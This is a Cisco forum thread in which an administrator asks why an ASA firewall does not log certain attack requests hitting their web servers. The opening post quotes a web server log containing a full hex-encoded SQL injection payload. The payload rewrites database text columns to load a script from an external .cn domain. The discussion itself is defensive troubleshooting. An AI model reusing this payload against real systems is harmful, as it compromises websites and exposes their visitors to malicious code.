Cisco Support Community
cancel
Showing results for 
Search instead for 
Did you mean: 
Announcements

Welcome to Cisco Support Community. We would love to have your feedback.

For an introduction to the new site, click here. If you'd prefer to explore, try our test area to get started. And see here for current known issues.

New Member

ASA not logging certian requests?

I have a bunch of attack requests not being logged by my asa-5550 version 7.2(4)

On my web-server I see an attack:

B.A.D.IP; HTTP/1.0 - [23/Jul/2008:11:37:30 -0700] GET /downloads/file/fid?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.0 500 4635; null; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

The only thing I see in the ASA log's is:

Jul 23 11:37:29 192.168.22.254 %ASA-7-609001: Built local-host outside:B.A.D.IP

Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718934 for outside:B.A.D.IP/2668 (B.A.D.IP/2668) to inside:192.168.10.100/80 (G.OO.D.IP/80)

Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718936 for outside:B.A.D.IP/2669 (B.A.D.IP/2669) to inside:192.168.10.100/80 (G.OO.D.IP/80)

Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718936 for outside:B.A.D.IP/2669 to inside:192.168.10.100/80 duration 0:00:01 bytes 4123 TCP FINs

Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718934 for outside:B.A.D.IP/2668 to inside:192.168.10.100/80 duration 0:00:01 bytes 4122 TCP FINs

Jul 23 11:37:30 192.168.22.254 %ASA-7-609002: Teardown local-host outside:B.A.D.IP duration 0:00:01

Usually I'll get the ASA logs (%ASA-5-304001) that I can grep for and see all of the 'Accessed URL' lines. For some reason none of these attacks are being logged. I'm concerned that not only are they getting through, they are doing so silently.

2 REPLIES
Bronze

Re: ASA not logging certian requests?

New Member

Re: ASA not logging certian requests?

Thank you for the response.

I am well aware of the logging types, the problem is that I'm not receiving the logging message 304001 for the given URI. I receive them for all other URI, just not this specific attack.

My thought is that the ASA signature swallows it, does not send it to syslog, and then passes it on to the web server. I'm okay with it passing it along but it seems a little odd that it does not get logged.

I was getting many of these requests and see them on all of my webservers but not one shows up in my syslog while all the other 304001 do show up.

238
Views
0
Helpful
2
Replies